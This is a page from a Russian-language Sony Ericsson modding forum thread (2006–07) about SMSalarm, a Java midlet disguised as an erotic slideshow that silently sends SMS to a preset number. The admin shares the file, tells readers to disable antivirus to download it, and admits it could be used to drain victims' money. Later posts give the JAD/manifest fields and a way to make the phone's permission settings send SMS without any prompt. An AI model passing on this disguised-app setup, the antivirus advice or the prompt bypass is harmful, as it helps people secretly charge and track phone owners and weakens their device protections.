Все для Sony Ericsson, патчи, эльфы, моддинг, прошивка
  
Логин: Пароль: Запомнить: Привет гость! Зарегистрируйся или авторизируйся для получения доп. возможностей!
Разделы
PDA версия сайта
TrackIDentify
Новости
Статьи
Файлы
Патчи
Патчи A2
Патчи db2020
Эльфы
Исходники эльфов
Wiki
Форум
Опросы
Обратная связь
Развернуть/Свернуть
 
Развернуть/Свернуть

SMSalarm в работе : Мультимедиа : Форум : Для Sony Ericsson патчи эльфы моддинг прошивка
/  Список форумов
   /  Мультимедиа
/  SMSalarm в работе
На печать 
Правила 
Страница 6 из 8: « 1 2 3 4 5 [6] 7 8 »

Zormax


Admin


Регистрация: 12.12.05
Сообщений: 5826
Репутация: 5274
Откуда: Nizhniy Novgorod




 
  #51 [12.07.06, 12:54] SMSalarm в работе   

 
Как известно для большинства телефонов других моделей есть возможнось отсылать скрытно SMS сообщения.
До недавнего времени в SE такого нельзя было сделать, т.к. инженеры компании подошли более серьезно к правам приложения.

С выходом патчей игнорирования "Полномочия" для явы, такая возможность появилась.

Ниже прикрепил измененый мною мидлет SMSalarm, который закомуфлирован под эротическое слайд-шоу.

После запуска мидлета, пока вы смотрите картинки, идет отправление на определеный номер СМС`ки с нужным текстом.

Установка приложения через JAD, но перед этим надо в JAD файле прописать свой номер (заместо 911, писать через 8 а не +7) и нужный текст (желательно латинсикй).

Зачем все это нужно?

1. Если у вас украдут телефон и у вас стоит патч и мидлет, то есть шанс что грабитель позарится на заманчивое название и запустит это слайд-шоу, тем самым вам станет известен номер грабителя (если он вставит свою симку).

2. Для отсылки скрытных сообщений.
К сожалению плохие люди могут воспользоваться этим, чтобы выкачать с вас деньги, например в обменник разместят, а вы скачаете и запустите.......

Предупрежден, значит вооружен (с)

ВНИМАНИЕ!!! Ваш антивирусник (Каспер, Веб, НОД и т.д.) будет ругаться и говорить что там троян. Это связано с анализом антивирусника на вредноносное ПО. В принципе, т.к. программа отсылает СМС, это и является вредноносным ПО. Это не позволит Вам скачать. Для скачки отключите антивирус потом качайте. Вы можете неповерить и подумать что Вам трояна впаривают, это Ваши проблемы. Больше не просим выслать на мыло или на другой файлообменник кинуть. Антивирус и от туда не даст Вам скачать.



Прикрепленный к сообщению файл:

smsalarm.zip smsalarm.zip (193.57 kb; 2306 hits) Скачать файл


TOOKY T83 (1.3.1-L2), MK808B

anonymous














  #52 [01.12.06, 20:53] Re: SMSalarm в работе   

 
Попробую чичас , надеюсь получится. А без установки патча в тело никак нельзя сделать как я понял?



ShuRe


Новичок


Регистрация: 10.8.06
Сообщений: 4
Репутация: 0
Откуда: Брянск




 
  #53 [04.01.07, 19:09] Re: SMSalarm в работе   

 
Gram поставить прогу можно, но она ОБЯЗАТЕЛЬНО задаст вопрос...



anonymous














  #54 [09.01.07, 08:07] Re: SMSalarm в работе   

 
Есть караоке с вставленой в неё SMSAlarm.В Яд файле также пишется номер,текст и ещё путь к *.kar файлам это как раз караошные песни.Прога работает:запускается,отсылает смс,но не видит караошные песни.Незнаю как правильно указать диск.Прогу могу выложить или кинуть на мыло.Прогу брал с Motofana и раньше стояла у меня на разаре.



anonymous














  #55 [30.01.07, 13:50] Re: SMSalarm в работе   

 
Почему приложение после подписание сертификатом халмера вообще откызываеться отпралять смс ?
я беру редактирую файлик MANIFEST.MF в котором добаляю строки из яда т.е.
alarmphone: "мой номер"
alarmtext: "текст тот что мне нужен латиницей"
delay: 250
footer: Hot Sexi Girls
header: Hot Sexi Girls
send: True
Затем беру яр и подписываю его халмером...появляеться яд..в котором есть номер кот я указал и текст сообещния..захожу в приложение уже с телефона..а ничего и не происходит...вообще..кроме смены картинок с тетками :)



Zormax


Admin


Регистрация: 12.12.05
Сообщений: 5826
Репутация: 5274
Откуда: Nizhniy Novgorod




 
  #56 [30.01.07, 17:02] Re: SMSalarm в работе   

 
VADER
Надеюсь через JAD устанавливал?
Если да, то возможно не дружит с таким файлами прога, чтоб в JAD стока пихали.




TOOKY T83 (1.3.1-L2), MK808B

anonymous














  #57 [30.01.07, 17:22] Re: SMSalarm в работе   

 
mobilefree пишет:
VADER
Надеюсь через JAD устанавливал?
Если да, то возможно не дружит с таким файлами прога, чтоб в JAD стока пихали.

Не знаю в чем была проблема..но сейчас неподписанное приложение отправляет без запроса смс
Еще раз проверил..поставил подписанное ...вообщем вообще ничего не отправлило...
Удалил поставил неподписанное зашел в полномочия сообщений..там либо не отправлять либо один запрос...запуск приложения- вылетело сообщение о запросе принимать ли сообщения..нажал да, и дальше вылезло сообщение где написано на какой номер отправляеться смс...нажал НЕТ..вышел с приложения...зашел снова в полномочия..и о чудо появилось в пункте сообщения строчка без запроса...запускаю снова приложение и оно тупо без запросов отправляет вес что указано в jad
В чем прикол ? я думал наоборот подписанное халмером будет справляться а тут совсем наоборот...и как то по кривому
А сейчас еще раз проверил...так вот вообще после первого запуска приложения...в независимости от результата...нажали вы да или нет при отправке смс...то второй раз в полномочиях этого приложения появляеться пункт без запроса..что дает возможность скрытно отправлять смс...тогда сразу вопрос..это только у меня ? у меня кстати стоит сертификат халмера...при этом я не стал ставить патч на игонор явы...не хочу....зачем же тут все столько писали что нужен патч и т.д. помойму и без него все прекрасно работает...и при этом не надо ничего подписывать...просто один раз зупстить приложение..
[ Редактировано VADER в 30.1.07 17:30 ]

[ Редактировано VADER в 30.1.07 17:37 ]



Zormax


Admin


Регистрация: 12.12.05
Сообщений: 5826
Репутация: 5274
Откуда: Nizhniy Novgorod




 
  #58 [30.01.07, 17:43] Re: SMSalarm в работе   

 
VADER
В чем прикол ?

Про этот прикол вроде рассказано на предыдущих страницах...




TOOKY T83 (1.3.1-L2), MK808B

anonymous














  #59 [30.01.07, 17:44] Re: SMSalarm в работе   

 
mobilefree пишет:
VADER
В чем прикол ?

Про этот прикол вроде рассказано на предыдущих страницах...

Хм..вроде внимательно читал не увидел..сейчас еще раз перечитаю.
ПЕРЕЧИТАЛ...все отписываються что якобы нужен патч на игнорирование явы...а он не нужен :)
и увдел только твой ответ что надо кинуть сертификат...но после этого все равно продолжали писать что то про патч
вот что последний раз написали
Gram поставить прогу можно, но она ОБЯЗАТЕЛЬНО задаст вопрос...
и это после долгих обсуждений...так никто и не написал что не нужен этот патч...а вот наличие халмера я не знаюю...обязательно ли...проверю
[ Редактировано VADER в 30.1.07 17:46 ]

[ Редактировано VADER в 30.1.07 17:49 ]



Zormax


Admin


Регистрация: 12.12.05
Сообщений: 5826
Репутация: 5274
Откуда: Nizhniy Novgorod




 
  #60 [30.01.07, 17:53] Re: SMSalarm в работе   

 
VADER
и это после долгих обсуждений...так никто и не написал что не нужен этот патч...

Тоже не обязательно да и многие знают что работает как ты описал.
Но просто кому то лень ответить, кто-то юзает сертификат, кто-то патч, тема ведь создавалась когда и в помине не было разговора про 49 цид...




TOOKY T83 (1.3.1-L2), MK808B

anonymous














  #61 [30.01.07, 17:56] Re: SMSalarm в работе   

 
Так сертификат нужен или вообще можно без ничего поставить приложение и со второго раза оно будет работать нормельно ? без запросов


Страница 6 из 8: « 1 2 3 4 5 [6] 7 8 »


Похожие темы
 ТемаОтветыАвторПросмотрыОбновление
  Проблемы при работе с Far-ом7zero_2808796510.05.09, 12:31
  Виснет при работе радио4alb884578711.01.09, 18:12
  вопросы по работе с k7902anonymous411924.01.07, 08:37

  • Поиск
  • Права
Вы не можете начинать темы.
Вы не можете редактировать свои сообщения.
Вы не можете создавать опросы.
Вы не можете вкладывать файлы в сообщения.
Вы не можете отвечать на сообщения.
Вы не можете удалять свои сообщения.
Вы не можете голосовать.

Главная Новости Статьи Файлы Патчи Форум Опросы PDA
- Генерация страницы: 0.13 секунд | 12 Запросов | HTML: 43.68 КБ -